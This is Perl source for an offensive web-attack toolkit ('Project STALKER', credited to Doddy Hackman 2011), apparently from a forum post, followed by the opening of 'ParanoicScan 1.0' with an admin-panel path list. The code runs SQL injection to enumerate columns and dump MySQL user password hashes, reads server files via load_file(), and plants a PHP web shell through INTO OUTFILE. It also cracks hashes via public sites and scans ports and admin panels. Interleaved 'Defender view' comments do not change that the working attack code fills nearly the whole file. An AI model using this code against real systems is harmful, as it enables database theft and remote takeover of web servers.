$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
# One request per row using "limit N,1"; the range is inclusive (count+1 requests).
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}

# mysqluser(page, bypass, save)
# Checks whether the injected query can read mysql.user and, if so, prints and
# logs Host, User and Password for each row.
# Defender view: this only works when the web application's database account
# may SELECT from mysql.user. Application accounts should hold privileges on
# their own schema only. Requests naming "mysql.user" in a query string are a
# clear indicator in access/WAF logs.
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
# $pass1/$pass2, $code and $code1 are package globals.
($pass1,$pass2) = &bypass($bypass);
# Probe: selecting only the marker from mysql.user shows whether the table is readable.
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
# The substitution only changes $cop on the first pass; afterwards the placeholder is gone.
# Here the marker is the hex literal 0x524154535850444f574e ("RATSXPDOWN", no trailing 1).
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
# reload() is defined outside this part of the file; "&reload;" passes the current @_ along.
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}

# dump(page, column1, column2, table, bypass, save)
# Reads two columns of $table row by row through an injectable URL and logs
# each pair via savefile($save.".txt", ...).
#   $_[0] page, $_[1]/$_[2] column names, $_[3] table, $_[4] bypass style, $_[5] log name
# Defender view: requests carry char(69,82,84,79,82,56,53,52), which spells the
# marker ERTOR854, plus a "limit N,1" counter that increases by one per request.
# That sequential pattern from one client is easy to rate-limit and alert on.
# NOTE(review): "dump" is also the name of a Perl builtin; verify how callers invoke this sub.
sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
# $pass1/$pass2, $concatx, $concat, $val_code, $tota and $injection are package globals.
($pass1,$pass2) = &bypass($_[4]);
# Split the URL template around the placeholder.
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n\n";
last;
# Unreachable: "last" has already left the loop.
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}


# loadfile(page, bypass, save)
# Prompts for a file path on STDIN and asks the database server to return that
# file through MySQL's load_file(); the content is printed and logged.
# Defender view: load_file() needs the FILE privilege and is limited by
# secure_file_priv. Web application accounts should not hold FILE. The requests
# contain "load_file(0x..." and char(107,48,98,114,97), which spells the marker k0bra.
sub loadfile {
savefile($_[2].".txt","\n");
# $pass1/$pass2 and $concat are package globals.
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] File to read : ";
chomp (my $file = <stdin>);
# encode() turns the path into a 0x... hex literal, so the request needs no quotes.
$concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
my $code = toma($start.$concat.$end.$pass2);
chomp $code;
# /s lets (.*) span newlines so a multi-line file body is captured.
if ($code=~/k0bra(.*)k0bra/s) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}
&reload;
}


# into(page, bypass, dir, save)
# Tries to make the database server write a PHP file named shell.php below $dir
# through "INTO OUTFILE", then requests it over HTTP to see whether it exists.
# The hex literal on the first toma() line is the file body: an HTML title
# ("Mini Shell By Doddy", the string checked afterwards) followed by a PHP
# snippet that hands the "cmd" request parameter to system().
# Defender view:
#  - The write only succeeds when the database account holds the FILE privilege,
#    secure_file_priv does not restrict the target, and the database server's OS
#    user can write inside the web root. Removing any one of the three blocks it.
#  - "into outfile" in a query string, and a new shell.php (or any unexpected
#    .php file) under the document root, are high-confidence indicators.
sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
# $pass1/$pass2, $shell, $code and $code1 are package globals.
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
# $1 still holds the capture from the $path match above and is used as an unescaped pattern.
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
# Verification request: fetch the file over HTTP and look for its title string.
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
print "\n\n";
&reload;
}


# bypass(style)
# Returns the pair (separator, terminator) that the query-building subs place
# between SQL keywords and at the end of the request:
#   "/*"  -> ("/**/", "/*")
#   "%20" -> ("%20",  "%00")
#   other -> ("+",    "--")
# Defender view: filters that only look for literal spaces miss all three
# separator styles, so log/WAF rules should normalise them before matching.
sub bypass {
    my ($style) = @_;

    my %pair_for = (
        '/*'  => [ '/**/', '/*' ],
        '%20' => [ '%20',  '%00' ],
    );

    # Anything not listed above (including undef) falls back to "+" / "--".
    my $key  = defined $style ? $style : q{};
    my $pair = exists $pair_for{$key} ? $pair_for{$key} : [ '+', '--' ];

    return ( $pair->[0], $pair->[1] );
}

# ascii(text)
# Returns the code points of $text as a comma-separated decimal list,
# e.g. "AB" -> "65,66". The SQL-building subs wrap the result in char(...).
sub ascii {
    my @code_points = unpack 'U*', $_[0];
    return join q{,}, @code_points;
}

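# base(text)
# Returns $text encoded as Base64 on a single line.
# encode_base64() wraps its output every 76 characters by default and the old
# chomp only removed the final newline, so long inputs came back with embedded
# line breaks. Passing an empty end-of-line string avoids that. The result is
# kept in a lexical instead of the package global $re that other subs also use.
sub base {
    my ($text) = @_;
    my $encoded = encode_base64( $text, q{} );
    return $encoded;
}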

# base_de(text)
# Decodes Base64 $text and returns the result with one trailing newline removed.
# The decoded value is also left in the package global $re, as before.
sub base_de {
    my ($encoded) = @_;
    chomp( $re = decode_base64($encoded) );
    return $re;
}


# download(url, file)
# Mirrors $_[0] to the local path $_[1] with the shared user agent $nave and
# returns the bareword "true" when the local file exists afterwards. On any
# other path the sub falls off the end and returns the value of the last test.
# NOTE(review): "true" is a bareword; without strict and without a sub of that
# name it is the string "true". Confirm against the top of the file.
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}


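# hex_en(text)
# Returns $text as a "0x"-prefixed hex string, two digits per character.
# The previous "%x" format emitted a single digit for characters below 0x10
# (for example "\n" became "a"), which made the output ambiguous and impossible
# for hex_de() to decode; "%02x" keeps every byte two digits wide.
# The result is built in a lexical rather than the package global $hex.
sub hex_en {
    my ($string) = @_;
    my $hex = '0x';
    for my $char ( split //, $string ) {
        $hex .= sprintf '%02x', ord $char;
    }
    return $hex;
}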

# hex_de(text)
# Decodes a hex string (optional leading "0x") into characters, two hex digits
# per character. A trailing odd digit is ignored. The decoded value is also
# left in the package global $encode, as before.
sub hex_de {
    my ($text) = @_;
    $text =~ s/^0x//;

    my @digit_pairs = $text =~ /../g;
    $encode = q{};
    for my $pair (@digit_pairs) {
        $encode .= chr hex $pair;
    }
    return $encode;
}

# ascii_de(text)
# Turns a comma-separated list of decimal code points back into a string,
# e.g. "65,66" -> "AB". Inverse of ascii().
sub ascii_de {
    my ($list) = @_;
    my @chars = map { chr $_ } split /,/, $list;
    return join q{}, @chars;
}

# getprocess()
# Returns a hash that maps each running process's Caption to its ProcessId,
# read from the local WMI class Win32_Process (namespace root\cimv2).
# Processes that share a Caption collapse into one entry; the last one wins.
sub getprocess {

    my $locator = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $wmi     = $locator->ConnectServer( "", "root\\cimv2" );

    my %pid_of;
    for my $process ( in( $wmi->InstancesOf("Win32_Process") ) ) {
        my $caption = $process->{Caption};
        $pid_of{$caption} = $process->{ProcessId};
    }

    return %pid_of;
}

# killprocess(numb, pid)
# Calls Win32::Process::KillProcess($pid, $numb): the second argument of this
# sub is the process id, the first is forwarded as KillProcess's second argument.
# NOTE(review): "true" and "false" are barewords. Without strict, and unless
# subs of those names exist elsewhere in the file, both are non-empty strings,
# so a caller testing the result in boolean context sees success either way.
sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

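# getip(host)
# Resolves $host and returns its first IPv4 address in dotted-quad form.
# Returns nothing (undef in scalar context) when the name does not resolve;
# previously the undefined result was passed straight to inet_ntoa(), which
# aborts the whole program on a bad argument.
sub getip {
    my ($host) = @_;
    my $packed = gethostbyname($host);
    return unless defined $packed;
    return inet_ntoa($packed);
}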

# crackit(hash)
# Looks a hash up on a fixed list of public lookup sites and appends any hit to
# logs/pass-found.txt as "hash:cleartext".
# NOTE(review): the hash is sent to every listed third party, all over plain
# http://, so the value is disclosed to each service and to anyone on the
# network path. Credential audits should use an offline check instead.
# NOTE(review): the single-quoted 'regex' and 'variables' strings keep "$_[0]"
# as literal text, and 'variables' is a string where tomar() dereferences a
# hash reference; confirm both against how the values are consumed below.
sub crackit {

my $secret = $_[0];

print "[+] Cracking $_[0]\n\n";

# Keyed by service URL. 'tipo' selects GET or POST, 'regex' extracts the answer.
my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

# keys() order is not fixed, so the services are queried in arbitrary order.
for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
# GET services take the hash appended to the URL. $code is a package global.
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n";
}

# ftp(host, user, pass)
# Interactive FTP client on top of Net::FTP: logs in, then reads commands from
# STDIN in a label/goto loop and maps them to Net::FTP calls.
# NOTE(review): plain FTP carries the login and all data unencrypted.
# NOTE(review): commands are matched as unanchored substrings, so one input can
# trigger several branches (for example "rmdir x" and "mkdir x" also match /dir/).
# NOTE(review): the help text says "mdkdir" while the handler matches "mkdir",
# and it shows get/put with one argument while the patterns require two.
# NOTE(review): "next" in the exit/quit branches is not inside a loop block
# (the label/goto construct is not a loop); confirm how they behave at run time.
sub ftp {

my ($ftp,$user,$pass) = @_;

if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

# Start of the command loop; "goto menu" at the bottom jumps back here.
menu:

print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory 
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

# Both captures are greedy, so the split happens at the last space of the input.
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
next;
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/quit/) {
next;
}

goto menu;

} else {
print "\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}



}


# scanpaths(url)
# Collects the links on $_[0], keeps those on the same host (or relative ones),
# strips the file name from each and requests the remaining directory URL. A
# response containing "Index Of" is reported and appended to
# logs/paths-found.txt.
# Defender view: the finding is an enabled directory listing. Turning
# auto-indexing off on the web server removes it.
# NOTE(review): $auth and $borrar are used as unescaped regex patterns, and
# $url and $code are package globals.
sub scanpaths {

my $urla = $_[0];

print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
# Same host as the start URL, or a relative link with no authority part.
if ($_[0] =~/$auth/ or $auth eq "") {
# Path ends in "<name>.<ext>": $2.$3 is the file name to cut off.
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
# Relative link: prefix it with the start URL.
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}}


# scanport(host)
# Attempts a full TCP connection to six fixed ports on $_[0] with a 0.5 s
# timeout and prints every port that accepts, with the service name from %ports.
# Defender view: these are ordinary completed connections, so they show up in
# firewall and service connection logs as short-lived sessions from one source
# to ports 21, 22, 25, 80, 110 and 3306.
sub scanport {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "[+] Scanning $_[0]\n\n\n";

# keys() order is not fixed, so ports are probed in arbitrary order.
for my $port(keys %ports) {

# The socket object is not stored; only the success of the connect is used.
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}


# scanpanel(base_url)
# Requests $_[0]."/".$path for every entry of @panels (defined outside this
# sub) and reports each URL whose response is_success, also appending it to
# logs/panel-logs.txt.
# Defender view: the pattern is one client requesting many login/admin paths in
# a short burst, most of them answered 404. Rate limiting and alerting on that
# burst, and keeping admin interfaces off the public site, address it.
# $path and $code are package globals.
sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}

# google(query, max_start)
# Fetches Google result pages for $a with start=10,20,...,$b, keeps links to
# webcache.googleusercontent.com and returns the de-duplicated URLs extracted
# from the "cache:<id>:<url>+" part of those links.
# NOTE(review): $a and $b shadow the variables sort() uses; @url, @founds,
# $pages and $code are package globals, so results accumulate across calls.
# The query is concatenated into the URL without URL-encoding.
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

# The right-hand @founds is still the package array filled above.
my @founds = repes(@founds);

return @founds;
}


# sql(page)
# Appends "-1+union+select+666--" to $page and reports the URL (and appends it
# to logs/sql-logs.txt) when the response contains MySQL's "The used SELECT
# statements have a different number of columns" error.
# Defender view: the check depends on the database error text reaching the
# client. Parameterised queries remove the flaw, and generic error pages remove
# the signal. "union+select+666" in a query string is a usable log signature.
# $code1 is a package global.
sub sql {

my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}

# get_links(html)
# Parses $_[0] with HTML::LinkExtor and returns the link attribute values that
# the callback agarrar() collected.
# NOTE(review): @links and $test are package globals and @links is never
# emptied here, so each call also returns the links found by earlier calls.
# agarrar is written inside get_links, but named subs are package-level in
# Perl, so it is an ordinary sibling sub.
sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

# Callback: receives the tag name and its link attributes; keeps the values only.
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

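# repes(list)
# Returns the items of the argument list with duplicates removed, keeping the
# first occurrence of each and the original order.
# The previous version pushed into the package arrays @limpio and %repe, which
# were never reset: a second call returned the first call's items as well and
# silently dropped anything already seen. Both are now lexical to each call.
sub repes {
    my %seen;
    my @limpio = grep { !$seen{$_}++ } @_;
    return @limpio;
}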

# head()
# Prints the program banner between two cprint() colour codes.
sub head {
    my $banner = "\n\n-- == Project STALKER == --\n\n";
    cprint("\x0311");    #13
    print $banner;
    cprint("\x030");
}

# copyright()
# Prints the copyright line between two cprint() colour codes.
sub copyright {
    my $notice = "\n\n(C) Doddy Hackman 2011\n\n";
    cprint("\x0311");    #13
    print $notice;
    cprint("\x030");
}

# toma(url)
# GETs $url with the shared user agent $nave and returns the response body.
# The body is returned whatever the HTTP status was.
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}

# tomax(url)
# GETs $url with the shared user agent $nave and returns the response object,
# so callers can inspect the status (for example ->is_success).
sub tomax {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response;
}

# tomar(url, fields)
# POSTs the key/value pairs of the hash reference $var to $web with the shared
# user agent $nave and returns the response body.
sub tomar {
    my ( $web, $var ) = @_;
    my @form_fields = %{$var};
    my $response    = $nave->post( $web, \@form_fields );
    return $response->content;
}


# conectar(host, port, command)
# Opens a TCP connection to host:port (5 s timeout), sends $command followed by
# CRLF, reads up to 5000 bytes and returns them with CRLF appended.
# The reply is also left in the package global $re, as before.
# NOTE(review): the connection result is not checked; when the connect fails the
# print on an undefined handle aborts the program.
sub conectar {
    my ( $host, $port, $command ) = @_;

    my $sockex = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Timeout  => 5,
    );

    print {$sockex} $command . "\r\n";
    $sockex->read( $re, 5000 );
    $sockex->close;

    return $re . "\r\n";
}


# enter(host, user, pass)
# Minimal interactive MySQL client: connects through DBI to $host on port 3306
# and, until "exit" is typed, runs each line read from STDIN as a statement and
# prints the column names and rows.
# NOTE(review): the DSN carries no TLS options, so whether the session is
# encrypted depends on driver and server defaults. Confirm before using it
# across an untrusted network.
# NOTE(review): the results of prepare() and execute() are not checked before
# $re->rows and $re->{NAME} are used. $info, $re and @row are package globals.
sub enter {

my ($host,$user,$pass) = @_;

print "[+] Connecting to the server\n";

$info = "dbi:mysql::".$host.":3306";
# PrintError=>0 silences DBI's own warnings; failures surface only via the checks below.
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

print "\n[+] Enter in the database";

while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);

if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}

$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();

my @columnas = @{$re->{NAME}};

# A row count of -1 is treated as a failed statement.
if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}

# encode(text)
# Returns $text as a "0x"-prefixed hex string built with "%x" per character;
# loadfile() uses it to pass a file path as a hex literal.
# Characters below 0x10 produce a single hex digit. The result is also left in
# the package global $hex, as before.
sub encode {
    my ($string) = @_;
    my @hex_digits = map { sprintf '%x', ord $_ } split //, $string;
    $hex = join q{}, '0x', @hex_digits;
    return $hex;
}

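# saveyes(file, line)
# Appends $line plus a newline to $file. Returns the result of close() on
# success and a false value when the file cannot be opened.
# Uses three-argument open with a lexical handle: with the old two-argument
# form the file name was parsed together with the mode (leading/trailing
# whitespace was stripped), and the bareword handle SAVE was shared by every
# sub that wrote a log.
sub saveyes {
    my ( $file, $line ) = @_;

    # Logging is best-effort: an unwritable log must not abort the caller.
    open my $fh, '>>', $file or return;
    print {$fh} $line . "\n";
    return close $fh;
}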

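# savefile(name, line)
# Appends $line plus a newline to logs/webs/$name. Returns the result of
# close() on success and a false value when the file cannot be opened.
# Uses three-argument open with a lexical handle instead of the two-argument
# form and the shared bareword handle SAVE.
# NOTE(review): $name is joined to the directory as-is; if it is derived from a
# remote host name or URL, a value containing "../" would leave logs/webs/.
# Verify against the callers.
sub savefile {
    my ( $name, $line ) = @_;

    # Logging is best-effort: an unwritable log must not abort the caller.
    open my $fh, '>>', 'logs/webs/' . $name or return;
    print {$fh} $line . "\n";
    return close $fh;
}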

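# coleccionar(dir)
# Returns the entry names of directory $dir as readdir() yields them, including
# "." and "..". Returns an empty list when the directory cannot be opened.
# The previous version called close() on a handle opened with opendir(), which
# does not release a directory handle; it now uses closedir() on a lexical handle.
sub coleccionar {
    my ($dir) = @_;

    my @archivos;
    if ( opendir my $dh, $dir ) {
        @archivos = readdir $dh;
        closedir $dh;
    }
    return @archivos;
}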

# helpme()
# Prints the list of console commands between two cprint() colour codes.
# The text is a single qq() literal and is printed exactly as written.
sub helpme {

cprint "\x0310"; #13
print qq(

Commands :


getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command> 
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
cprint "\x030";
}

#
#  The End ?
#
#335
Scripting / [Perl] ParanoicScan 1.0
3 Diciembre 2011, 16:32 PM
Lo mismo que la versión anterior; solo se le agregó un buscador de paneles de administración y una nueva opción para buscar listados de directorios en las páginas que estamos escaneando.


#!usr/bin/perl
#Paranoic Scan 1.0 Updated
#(c)0ded by Doddy H 2011
#
#Search in google with a dork
#Scan type :
#
#XSS
#Full Source Discloure
#LFI
#RFI
#SQL GET & POST + admin
#Directory listing
#MSSQL
#Oracle
#Jet Database
#Find HTTP Options y Server nAME
#
#

use LWP::UserAgent;
use HTML::LinkExtor;
use HTML::Form;
use URI::Split qw(uri_split);
use IO::Socket;


# Relative paths that sqladmin() requests one after another below
# "http://<host>/" when it looks for login and administration pages.
# Defender view: one client asking for many of these paths within seconds, most
# answered with 404, is a simple pattern to rate-limit and alert on.
# Administrative interfaces are best kept off the public site altogether.
my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
